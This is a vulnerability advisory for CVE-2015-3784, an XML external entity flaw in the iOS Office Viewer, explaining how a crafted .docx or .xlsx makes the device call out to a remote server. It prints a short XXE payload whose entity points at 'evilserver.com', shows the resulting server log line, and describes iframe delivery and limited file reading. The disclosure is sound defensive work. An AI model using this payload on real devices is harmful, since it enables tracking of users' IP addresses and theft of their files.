Title: Apple iOS Office Viewer XXE vulnerability
CVE ID: CVE-2015-3784
CVSSv3 Base Score: 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
Vendor: Apple (http://www.apple.com)
Products: Apple iOS
Advisory Release Date: 14 August 2015
Advisory URL: https://labs.integrity.pt/advisories/cve-2015-3784
Credits: Discovery by Bruno Morisson <bm[at]integrity.pt>
iOS’s Office Viewer component is vulnerable to a XXE (XML eXternal Entity) attack when opening documents with XML based formats (such as .docx, or .key/keynote’09). When opening specially crafted document, the viewer will resolve external entities, and perform network connections to a remote host. The attacker will be able to identify the user’s IP address, and possibly read files from the victim’s iOS device.
Note: Apple also fixed the same vulnerability on OSX 10.10.5, however due to the sandboxing of the QuickLook process on OSX, as far as we could tell this specific issue was not exploitable.
Exploiting the vulnerability
To exploit this vulnerability, the attacker only needs to create a valid document that includes an external DTD file. For instance, changing the [Content_Types].xml file on a Microsoft Office OOXML file to include the following content
<!DOCTYPE go [
<!ENTITY % go2 SYSTEM "http://evilserver.com/XXE">
and saving it back into the .xlsx, .docx or .pptx file, the viewer will execute the go2 entity, and effectively connect back to the attacker controlled server.
Upon vieweing the document on the iOS device, the SYSTEM entity requesting the XXE file is executed:
xxx.xxx.xxx.xxx - - [12/Aug/2015 03:40:55] "GET /XXE HTTP/1.0" 200 -
Typical vectors will be either sending the malicious file through email, which will require user interaction to open the document, or through an IFRAME on a webpage, which will not require any intervention from the user, other than accessing the webpage, since mobile safari will automatically open the malicious document in the Office Viewer.
By exploiting this vulnerability, the attacker will be able to identify the user’s IP address, and by using out-of-band data extraction using parameter entities, the attacker is able to remotely read files from the iOS device, although with restrictions.
The viewer uses libxml2, which very restricted regarding file contents. Any file with a newline character, for instance, will not be loaded, and hence, will not be possible to be sent remotely. Other characters are also restricted, which leads to a very limited attack surface for successfully reading remote files.
Additionally, the process will be sandboxed, and the files to which access is possible will also be limited.
As a proof of concept, we were able to read remotely the PkgInfo file for mobilesafari while opening the document on the browser, which contains only valid characters.